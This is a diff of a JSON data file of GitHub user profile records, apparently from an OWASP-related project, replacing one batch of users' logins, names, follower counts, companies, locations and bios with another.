"https://avatars.githubusercontent.com/u/80744099?v=4", - "company": "PTIT", - "location": "Viet Nam", + "avatar_url": "https://avatars.githubusercontent.com/u/292128?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 40, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2021-03-16T07:16:41Z", - "updated_at": "2024-08-30T11:19:54Z", - "node_id": "MDQ6VXNlcjgwNzQ0MDk5", - "bio": "NaN", + "following_count": 1, + "followers_count": 67, + "public_gists_count": 8, + "public_repositories_count": 59, + "created_at": "2010-05-31T09:20:24Z", + "updated_at": "2024-09-04T11:19:37Z", + "node_id": "MDQ6VXNlcjI5MjEyOA==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1064, + "pk": 6321, "fields": { - "nest_created_at": "2024-09-11T22:41:43.828Z", - "nest_updated_at": "2024-09-16T21:14:04.206Z", - "name": "", - "login": "einsibjarni", + "nest_created_at": "2024-09-22T07:41:30.279Z", + "nest_updated_at": "2024-09-22T18:44:03.397Z", + "name": "Sebastian Voss", + "login": "sebastianvoss", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35595673?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1159262?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-01-19T09:24:02Z", - "updated_at": "2024-09-07T10:48:00Z", - "node_id": "MDQ6VXNlcjM1NTk1Njcz", + "public_gists_count": 8, + "public_repositories_count": 39, + "created_at": "2011-10-29T08:12:36Z", + "updated_at": "2024-01-08T16:30:50Z", + "node_id": "MDQ6VXNlcjExNTkyNjI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386853,24 +643952,24 @@ }, { "model": "github.user", - "pk": 1065, + "pk": 6322, "fields": { - "nest_created_at": "2024-09-11T22:41:45.557Z", - "nest_updated_at": "2024-09-11T22:41:45.557Z", + "nest_created_at": "2024-09-22T07:41:31.575Z", + "nest_updated_at": "2024-09-22T18:47:10.013Z", "name": "", - "login": "allahshukur-ahmadzada", + "login": "RaineInto", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81165623?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/47811100?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-03-22T12:20:13Z", - "updated_at": "2024-07-05T07:19:17Z", - "node_id": "MDQ6VXNlcjgxMTY1NjIz", + "public_repositories_count": 1, + "created_at": "2019-02-20T08:12:25Z", + "updated_at": "2019-05-20T05:21:53Z", + "node_id": "MDQ6VXNlcjQ3ODExMTAw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386878,24 +643977,49 @@ }, { "model": "github.user", - "pk": 1066, + "pk": 6323, "fields": { - "nest_created_at": "2024-09-11T22:42:17.792Z", - "nest_updated_at": "2024-09-18T18:52:42.909Z", - "name": "LuizBoina", - "login": "LuizBoina", + "nest_created_at": "2024-09-22T07:41:31.917Z", + "nest_updated_at": "2024-09-22T18:44:05.015Z", + "name": "Rui Chen", + "login": "chenrui333", + "email": "rui@chenrui.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/1580956?v=4", + "company": "@meetup ", + "location": "New York", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 650, + "public_gists_count": 96, + "public_repositories_count": 142, + "created_at": "2012-03-27T19:17:28Z", + "updated_at": "2024-09-19T00:51:44Z", + "node_id": "MDQ6VXNlcjE1ODA5NTY=", + "bio": "", + "is_hireable": true, + "twitter_username": "chenrui" + } +}, +{ + "model": "github.user", + "pk": 6324, + "fields": { + "nest_created_at": "2024-09-22T07:41:32.855Z", + "nest_updated_at": "2024-09-22T19:42:24.643Z", + "name": "Valentin Dide", + "login": "validide", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32649613?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5551616?v=4", "company": "", - "location": "", + "location": "Bucharest, Romania", "collaborators_count": 0, - "following_count": 13, - "followers_count": 17, - "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2017-10-09T17:59:51Z", - "updated_at": "2024-07-15T16:25:26Z", - "node_id": "MDQ6VXNlcjMyNjQ5NjEz", + "following_count": 68, + "followers_count": 6, + "public_gists_count": 7, + "public_repositories_count": 19, + "created_at": "2013-09-26T17:17:41Z", + "updated_at": "2024-08-06T05:02:41Z", + "node_id": "MDQ6VXNlcjU1NTE2MTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386903,74 +644027,74 @@ }, { "model": "github.user", - "pk": 1067, + "pk": 6325, "fields": { - "nest_created_at": "2024-09-11T22:42:21.163Z", - "nest_updated_at": "2024-09-18T18:52:45.812Z", - "name": "Marcel Haag", - "login": "marcel-haag", - "email": "marcel.haag@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/73169169?v=4", + "nest_created_at": "2024-09-22T07:41:33.819Z", + "nest_updated_at": "2024-09-22T18:44:06.930Z", + "name": "Rogerio Bastos", + "login": "rogeriobastos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2397391?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 5, + "following_count": 0, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2020-10-20T10:11:12Z", - "updated_at": "2024-05-24T19:07:01Z", - "node_id": "MDQ6VXNlcjczMTY5MTY5", - "bio": "IT Nomad, Crafting solutions by day, Breaking applications by night. \r\n\r\nFounder and lead developer of security-c4po.", + "public_repositories_count": 12, + "created_at": "2012-09-22T02:41:34Z", + "updated_at": "2024-09-06T19:14:02Z", + "node_id": "MDQ6VXNlcjIzOTczOTE=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1068, + "pk": 6326, "fields": { - "nest_created_at": "2024-09-11T22:42:33.484Z", - "nest_updated_at": "2024-09-11T22:43:56.385Z", - "name": "Norman Schmidt", - "login": "norman-schmidt", + "nest_created_at": "2024-09-22T07:41:34.135Z", + "nest_updated_at": "2024-09-22T19:38:52.759Z", + "name": "Nacho Guisado Obregón", + "login": "gitnachogo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60552466?v=4", - "company": "@NovatecConsulting", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67385224?v=4", + "company": "Orchestra.eu", + "location": "Seville", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, + "following_count": 33, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-02-01T18:34:58Z", - "updated_at": "2024-06-24T09:09:22Z", - "node_id": "MDQ6VXNlcjYwNTUyNDY2", - "bio": "", + "public_repositories_count": 8, + "created_at": "2020-06-24T16:54:07Z", + "updated_at": "2024-03-24T12:15:26Z", + "node_id": "MDQ6VXNlcjY3Mzg1MjI0", + "bio": "#DevSecOps. I am a 26 year-old developer interested in security development.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1069, + "pk": 6327, "fields": { - "nest_created_at": "2024-09-11T22:42:38.436Z", - "nest_updated_at": "2024-09-11T22:43:08.375Z", - "name": "Stipe Knez", - "login": "Stipe-Knez", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/79542386?v=4", + "nest_created_at": "2024-09-22T07:41:34.454Z", + "nest_updated_at": "2024-09-22T18:44:07.568Z", + "name": "Lucas Ljungberg", + "login": "Lucasljungberg", + "email": "lucasljungberg@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5969120?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-02-23T20:11:51Z", - "updated_at": "2023-06-27T10:44:59Z", - "node_id": "MDQ6VXNlcjc5NTQyMzg2", + "public_repositories_count": 14, + "created_at": "2013-11-18T13:00:54Z", + "updated_at": "2024-07-17T18:28:06Z", + "node_id": "MDQ6VXNlcjU5NjkxMjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386978,24 +644102,24 @@ }, { "model": "github.user", - "pk": 1070, + "pk": 6328, "fields": { - "nest_created_at": "2024-09-11T22:42:57.043Z", - "nest_updated_at": "2024-09-11T22:42:57.043Z", - "name": "", - "login": "Challakh-MA", + "nest_created_at": "2024-09-22T07:41:34.784Z", + "nest_updated_at": "2024-09-22T18:44:07.911Z", + "name": "Largou Walid", + "login": "wlargou", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/152565073?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/62861462?v=4", + "company": "Power Maroc", + "location": "Casablanca", "collaborators_count": 0, - "following_count": 0, + "following_count": 7, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-30T23:07:31Z", - "updated_at": "2023-12-01T13:59:20Z", - "node_id": "U_kgDOCRf1UQ", + "public_repositories_count": 11, + "created_at": "2020-03-30T00:55:13Z", + "updated_at": "2024-08-26T21:20:26Z", + "node_id": "MDQ6VXNlcjYyODYxNDYy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387003,74 +644127,74 @@ }, { "model": "github.user", - "pk": 1071, + "pk": 6329, "fields": { - "nest_created_at": "2024-09-11T22:44:11.340Z", - "nest_updated_at": "2024-09-18T18:54:23.946Z", - "name": "TESTABLE", - "login": "testable-eu", + "nest_created_at": "2024-09-22T07:41:35.115Z", + "nest_updated_at": "2024-09-22T18:44:08.223Z", + "name": "Ilya Boyazitov", + "login": "Bizordec", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/115642030?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25798995?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 5, "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2022-10-12T13:47:02Z", - "updated_at": "2023-06-20T15:23:58Z", - "node_id": "O_kgDOBuSOrg", + "public_repositories_count": 20, + "created_at": "2017-02-15T16:25:13Z", + "updated_at": "2024-09-03T18:41:27Z", + "node_id": "MDQ6VXNlcjI1Nzk4OTk1", "bio": "", "is_hireable": false, - "twitter_username": "Testable_EU" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1072, + "pk": 6330, "fields": { - "nest_created_at": "2024-09-11T22:44:14.588Z", - "nest_updated_at": "2024-09-13T05:21:52.295Z", - "name": "compaluca", - "login": "compaluca", - "email": "luca.compagna@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/12697501?v=4", + "nest_created_at": "2024-09-22T07:41:35.740Z", + "nest_updated_at": "2024-09-22T20:31:23.234Z", + "name": "Duarte Duarte", + "login": "DDuarte", + "email": "dnpd.dd@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/530940?v=4", "company": "", - "location": "", + "location": "Portugal", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2015-06-01T14:03:28Z", - "updated_at": "2024-09-10T10:01:12Z", - "node_id": "MDQ6VXNlcjEyNjk3NTAx", - "bio": "", + "following_count": 76, + "followers_count": 189, + "public_gists_count": 73, + "public_repositories_count": 89, + "created_at": "2010-12-20T19:05:10Z", + "updated_at": "2024-09-16T22:38:09Z", + "node_id": "MDQ6VXNlcjUzMDk0MA==", + "bio": "AppSec", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1073, + "pk": 6331, "fields": { - "nest_created_at": "2024-09-11T22:44:16.173Z", - "nest_updated_at": "2024-09-18T18:54:22.175Z", - "name": "Judith", - "login": "felix-20", + "nest_created_at": "2024-09-22T07:41:36.366Z", + "nest_updated_at": "2024-09-22T18:47:10.965Z", + "name": "Anush Reddy", + "login": "anush-cr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39854388?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9949303?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 8, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2018-06-02T10:24:01Z", - "updated_at": "2024-09-11T10:13:42Z", - "node_id": "MDQ6VXNlcjM5ODU0Mzg4", + "created_at": "2014-11-25T15:48:38Z", + "updated_at": "2023-07-09T20:18:33Z", + "node_id": "MDQ6VXNlcjk5NDkzMDM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387078,24 +644202,24 @@ }, { "model": "github.user", - "pk": 1074, + "pk": 6332, "fields": { - "nest_created_at": "2024-09-11T22:44:17.365Z", - "nest_updated_at": "2024-09-11T22:44:54.108Z", - "name": "Malte", - "login": "mal-tee", + "nest_created_at": "2024-09-22T07:41:36.673Z", + "nest_updated_at": "2024-09-22T18:44:09.771Z", + "name": "bong bong", + "login": "bongbongbee", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45886910?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2897395?v=4", "company": "", - "location": "Germany", + "location": "Singapore", "collaborators_count": 0, - "following_count": 39, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2018-12-14T23:08:28Z", - "updated_at": "2024-09-07T11:06:08Z", - "node_id": "MDQ6VXNlcjQ1ODg2OTEw", + "following_count": 9, + "followers_count": 11, + "public_gists_count": 2, + "public_repositories_count": 33, + "created_at": "2012-11-27T01:39:10Z", + "updated_at": "2024-09-05T11:38:09Z", + "node_id": "MDQ6VXNlcjI4OTczOTU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387103,24 +644227,24 @@ }, { "model": "github.user", - "pk": 1075, + "pk": 6333, "fields": { - "nest_created_at": "2024-09-11T22:44:19.011Z", - "nest_updated_at": "2024-09-11T22:44:25.257Z", + "nest_created_at": "2024-09-22T07:41:36.985Z", + "nest_updated_at": "2024-09-22T18:44:10.083Z", "name": "", - "login": "vlkl-sap", + "login": "bobflannigon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71723302?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/42199073?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2020-09-22T17:07:25Z", - "updated_at": "2024-03-12T17:50:22Z", - "node_id": "MDQ6VXNlcjcxNzIzMzAy", + "public_repositories_count": 1, + "created_at": "2018-08-08T06:20:34Z", + "updated_at": "2024-08-29T14:31:23Z", + "node_id": "MDQ6VXNlcjQyMTk5MDcz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387128,24 +644252,24 @@ }, { "model": "github.user", - "pk": 1076, + "pk": 6334, "fields": { - "nest_created_at": "2024-09-11T22:44:28.237Z", - "nest_updated_at": "2024-09-11T22:44:28.237Z", - "name": "Manu", - "login": "ManuManu97", + "nest_created_at": "2024-09-22T07:41:37.298Z", + "nest_updated_at": "2024-09-22T18:44:10.392Z", + "name": "officebluesource", + "login": "officebluesource", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48594310?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3057403?v=4", + "company": "bluesource - mobile solutions gmbh", + "location": "Hagenberg, Austria", "collaborators_count": 0, - "following_count": 13, + "following_count": 0, "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2019-03-15T13:51:59Z", - "updated_at": "2024-09-05T23:42:31Z", - "node_id": "MDQ6VXNlcjQ4NTk0MzEw", + "public_repositories_count": 37, + "created_at": "2012-12-16T18:44:29Z", + "updated_at": "2024-09-12T13:53:03Z", + "node_id": "MDQ6VXNlcjMwNTc0MDM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387153,174 +644277,149 @@ }, { "model": "github.user", - "pk": 1077, + "pk": 6335, "fields": { - "nest_created_at": "2024-09-11T22:44:29.545Z", - "nest_updated_at": "2024-09-11T22:44:59.442Z", - "name": "Lukas Seidel", - "login": "pr0me", + "nest_created_at": "2024-09-22T07:41:37.603Z", + "nest_updated_at": "2024-09-22T18:44:10.699Z", + "name": "", + "login": "anoreg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5177161?v=4", - "company": "Binarly", - "location": "Germany", - "collaborators_count": 0, - "following_count": 3, - "followers_count": 50, - "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2013-08-06T20:40:33Z", - "updated_at": "2024-08-16T06:58:27Z", - "node_id": "MDQ6VXNlcjUxNzcxNjE=", - "bio": "Information Security Researcher and PhD Candidate", - "is_hireable": true, - "twitter_username": "pr0me" - } -}, -{ - "model": "github.user", - "pk": 1078, - "fields": { - "nest_created_at": "2024-09-11T22:44:47.385Z", - "nest_updated_at": "2024-09-11T22:44:47.385Z", - "name": "Soheil", - "login": "SoheilKhodayari", - "email": "soheil.khodayari@cispa.saarland", - "avatar_url": "https://avatars.githubusercontent.com/u/6915465?v=4", - "company": "CISPA ", - "location": "Saarland, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/7417760?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 11, - "followers_count": 57, + "following_count": 2, + "followers_count": 2, "public_gists_count": 2, - "public_repositories_count": 48, - "created_at": "2014-03-11T06:09:10Z", - "updated_at": "2024-08-27T15:18:29Z", - "node_id": "MDQ6VXNlcjY5MTU0NjU=", - "bio": "Security & privacy researcher, hacking, patching, and drinking coffee... and then do it all over again!", - "is_hireable": true, - "twitter_username": "Soheil__K" + "public_repositories_count": 21, + "created_at": "2014-04-27T03:08:54Z", + "updated_at": "2024-07-15T04:50:48Z", + "node_id": "MDQ6VXNlcjc0MTc3NjA=", + "bio": "Android senior engineer, be interested in all android technology. Also like python, AI, VR, AR, blockchain", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1079, + "pk": 6336, "fields": { - "nest_created_at": "2024-09-11T22:44:52.845Z", - "nest_updated_at": "2024-09-11T22:44:52.845Z", - "name": "Simone Jovon", - "login": "Simojoviz", + "nest_created_at": "2024-09-22T07:41:37.927Z", + "nest_updated_at": "2024-09-22T18:44:11.021Z", + "name": "", + "login": "andreyeto", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57804307?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/51911032?v=4", "company": "", - "location": "Venice", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 5, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2019-11-15T15:04:17Z", - "updated_at": "2024-06-19T07:06:46Z", - "node_id": "MDQ6VXNlcjU3ODA0MzA3", + "public_repositories_count": 2, + "created_at": "2019-06-17T10:29:07Z", + "updated_at": "2024-07-15T12:42:00Z", + "node_id": "MDQ6VXNlcjUxOTExMDMy", "bio": "", "is_hireable": false, - "twitter_username": "simone_jovon" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1080, + "pk": 6337, "fields": { - "nest_created_at": "2024-09-11T22:44:56.572Z", - "nest_updated_at": "2024-09-11T22:44:56.572Z", - "name": "Martino Lessio", - "login": "mlessio", + "nest_created_at": "2024-09-22T07:41:38.246Z", + "nest_updated_at": "2024-09-22T18:44:11.351Z", + "name": "", + "login": "amuravski", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3406495?v=4", - "company": "@mindedsecurity ", - "location": "Italy", + "avatar_url": "https://avatars.githubusercontent.com/u/110661460?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 16, - "public_gists_count": 3, - "public_repositories_count": 26, - "created_at": "2013-01-28T14:09:27Z", - "updated_at": "2024-08-30T14:42:33Z", - "node_id": "MDQ6VXNlcjM0MDY0OTU=", - "bio": "Fullstack developer and Security consultant. Cooking lover and biker.", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-08-05T08:07:11Z", + "updated_at": "2024-09-09T07:18:27Z", + "node_id": "U_kgDOBpiPVA", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1081, + "pk": 6338, "fields": { - "nest_created_at": "2024-09-11T22:45:02.828Z", - "nest_updated_at": "2024-09-18T18:52:49.358Z", - "name": "MantiumAI", - "login": "mantiumai", - "email": "operations@mantiumai.com", - "avatar_url": "https://avatars.githubusercontent.com/u/82233875?v=4", - "company": "", - "location": "United States of America", + "nest_created_at": "2024-09-22T07:41:39.191Z", + "nest_updated_at": "2024-09-22T19:40:23.816Z", + "name": "Willie Nel", + "login": "willienel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4620380?v=4", + "company": "Nedap Healthcare", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 0, - "followers_count": 17, + "following_count": 30, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2021-04-09T17:59:14Z", - "updated_at": "2024-06-05T21:35:16Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjgyMjMzODc1", - "bio": "", + "public_repositories_count": 9, + "created_at": "2013-06-05T11:28:20Z", + "updated_at": "2024-09-13T11:57:20Z", + "node_id": "MDQ6VXNlcjQ2MjAzODA=", + "bio": "Security Software Engineer", "is_hireable": false, - "twitter_username": "MantiumAI" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1082, + "pk": 6339, "fields": { - "nest_created_at": "2024-09-11T22:45:06.282Z", - "nest_updated_at": "2024-09-18T18:52:52.097Z", - "name": "Alex Nork", - "login": "alex-nork", + "nest_created_at": "2024-09-22T07:41:39.814Z", + "nest_updated_at": "2024-09-22T19:42:28.429Z", + "name": "Ville Vaarala", + "login": "vaaralav", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48630278?v=4", - "company": "", - "location": "Columbus, OH", + "avatar_url": "https://avatars.githubusercontent.com/u/8571541?v=4", + "company": "@vektorio", + "location": "Finland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 25, + "followers_count": 21, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-03-16T18:36:20Z", - "updated_at": "2024-07-25T20:58:35Z", - "node_id": "MDQ6VXNlcjQ4NjMwMjc4", - "bio": "software engineer", + "public_repositories_count": 68, + "created_at": "2014-08-27T18:07:31Z", + "updated_at": "2024-09-13T12:19:01Z", + "node_id": "MDQ6VXNlcjg1NzE1NDE=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1083, + "pk": 6340, "fields": { - "nest_created_at": "2024-09-11T22:45:08.389Z", - "nest_updated_at": "2024-09-11T22:45:21.141Z", - "name": "Ryan", - "login": "rseveymant", + "nest_created_at": "2024-09-22T07:41:40.754Z", + "nest_updated_at": "2024-09-22T18:44:13.937Z", + "name": "", + "login": "g-kaz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/123193740?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/55018447?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 8, - "created_at": "2023-01-20T16:52:15Z", - "updated_at": "2024-08-06T23:27:01Z", - "node_id": "U_kgDOB1fJjA", + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-09-07T09:37:39Z", + "updated_at": "2024-09-13T17:00:41Z", + "node_id": "MDQ6VXNlcjU1MDE4NDQ3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387328,49 +644427,49 @@ }, { "model": "github.user", - "pk": 1084, + "pk": 6341, "fields": { - "nest_created_at": "2024-09-11T22:45:10.496Z", - "nest_updated_at": "2024-09-11T22:45:29.502Z", - "name": "Rob Zimmerman", - "login": "zimventures", + "nest_created_at": "2024-09-22T07:41:41.378Z", + "nest_updated_at": "2024-09-22T18:44:14.558Z", + "name": "", + "login": "knx-am", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23481310?v=4", - "company": "@ZimventuresLLC ", + "avatar_url": "https://avatars.githubusercontent.com/u/27404808?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 10, - "created_at": "2016-11-15T15:45:21Z", - "updated_at": "2024-08-11T16:52:47Z", - "node_id": "MDQ6VXNlcjIzNDgxMzEw", - "bio": "Just another keyboard wielding primate. ", + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-04-13T06:46:36Z", + "updated_at": "2024-09-09T09:18:57Z", + "node_id": "MDQ6VXNlcjI3NDA0ODA4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1085, + "pk": 6342, "fields": { - "nest_created_at": "2024-09-11T22:45:17.889Z", - "nest_updated_at": "2024-09-13T05:23:23.125Z", + "nest_created_at": "2024-09-22T07:41:41.689Z", + "nest_updated_at": "2024-09-22T18:47:11.918Z", "name": "", - "login": "JustEmrick", + "login": "kro29200", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/86671951?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/108056680?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 4, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-06-29T14:29:36Z", - "updated_at": "2023-08-18T00:24:47Z", - "node_id": "MDQ6VXNlcjg2NjcxOTUx", + "public_repositories_count": 4, + "created_at": "2022-06-23T08:19:02Z", + "updated_at": "2024-05-27T14:34:35Z", + "node_id": "U_kgDOBnDQaA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387378,74 +644477,74 @@ }, { "model": "github.user", - "pk": 1086, + "pk": 6343, "fields": { - "nest_created_at": "2024-09-11T22:45:30.717Z", - "nest_updated_at": "2024-09-18T18:52:53.950Z", - "name": "OWASP Dep Scan Project", - "login": "owasp-dep-scan", + "nest_created_at": "2024-09-22T07:41:41.996Z", + "nest_updated_at": "2024-09-22T18:44:15.209Z", + "name": "", + "login": "leoliaolei", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/143658023?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1937202?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 32, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2023-08-30T20:55:05Z", - "updated_at": "2024-01-17T17:04:57Z", - "node_id": "O_kgDOCJAMJw", - "bio": "", + "public_repositories_count": 13, + "created_at": "2012-07-08T02:08:44Z", + "updated_at": "2024-05-22T06:27:31Z", + "node_id": "MDQ6VXNlcjE5MzcyMDI=", + "bio": "Full stack software engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1087, + "pk": 6344, "fields": { - "nest_created_at": "2024-09-11T22:45:34.233Z", - "nest_updated_at": "2024-09-18T18:59:26.925Z", - "name": "prabhu", - "login": "prabhu", - "email": "prabhu@appthreat.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7842?v=4", - "company": "AppThreat", - "location": "", + "nest_created_at": "2024-09-22T07:41:42.314Z", + "nest_updated_at": "2024-09-22T18:44:15.555Z", + "name": "Lucas SAUDON", + "login": "lsaudon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25029876?v=4", + "company": "Freelance", + "location": "France", "collaborators_count": 0, - "following_count": 2, - "followers_count": 109, - "public_gists_count": 27, - "public_repositories_count": 87, - "created_at": "2008-04-18T18:54:25Z", - "updated_at": "2024-09-17T10:39:05Z", - "node_id": "MDQ6VXNlcjc4NDI=", - "bio": "Creator of @AppThreat ", + "following_count": 72, + "followers_count": 33, + "public_gists_count": 4, + "public_repositories_count": 27, + "created_at": "2017-01-10T10:23:51Z", + "updated_at": "2024-09-04T19:26:43Z", + "node_id": "MDQ6VXNlcjI1MDI5ODc2", + "bio": "", "is_hireable": false, - "twitter_username": "_prbh" + "twitter_username": "lsaudon" } }, { "model": "github.user", - "pk": 1088, + "pk": 6345, "fields": { - "nest_created_at": "2024-09-11T22:45:38.102Z", - "nest_updated_at": "2024-09-11T22:45:38.102Z", - "name": "rain", - "login": "lvyinggithub", + "nest_created_at": "2024-09-22T07:41:42.630Z", + "nest_updated_at": "2024-09-22T18:44:15.938Z", + "name": "", + "login": "mistog4n", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/34671786?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/88181996?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 145, - "created_at": "2017-12-19T05:47:56Z", - "updated_at": "2024-08-14T11:37:32Z", - "node_id": "MDQ6VXNlcjM0NjcxNzg2", + "public_repositories_count": 1, + "created_at": "2021-07-30T06:54:55Z", + "updated_at": "2021-11-04T08:14:30Z", + "node_id": "MDQ6VXNlcjg4MTgxOTk2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387453,24 +644552,24 @@ }, { "model": "github.user", - "pk": 1089, + "pk": 6346, "fields": { - "nest_created_at": "2024-09-11T22:45:42.208Z", - "nest_updated_at": "2024-09-11T22:45:42.208Z", + "nest_created_at": "2024-09-22T07:41:42.938Z", + "nest_updated_at": "2024-09-22T19:40:26.381Z", "name": "", - "login": "asjrosabal", + "login": "nekhtan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15805802?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/129828933?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 4, + "following_count": 0, + "followers_count": 0, 